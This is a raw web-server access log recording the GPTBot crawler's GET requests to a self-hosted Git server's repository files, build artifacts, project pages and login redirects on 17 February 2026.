"/windpacer/windpacer/rss/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 75] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.gitignore" -[17/Feb/2026:16:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.gitignore" -[17/Feb/2026:16:10:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.gitignore" -[17/Feb/2026:16:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.gitignore" -[17/Feb/2026:16:10:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:16:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=source" [Client 74.7.227.38] [Length 10985] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" -[17/Feb/2026:16:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" -[17/Feb/2026:16:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:16:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16093] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:16:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" -[17/Feb/2026:16:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=source" [Client 74.7.227.38] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:16:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11055] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=reversealphabetically" [Client 74.7.227.38] [Length 5466] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" -[17/Feb/2026:16:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:16:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7804] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" -[17/Feb/2026:16:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7808] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" -[17/Feb/2026:16:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7800] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" -[17/Feb/2026:16:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:16:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7803] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" -[17/Feb/2026:16:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70927] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12048] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70931] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:16:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17038] [Gzip 5.66] [Sent-to 192.168.0.250] 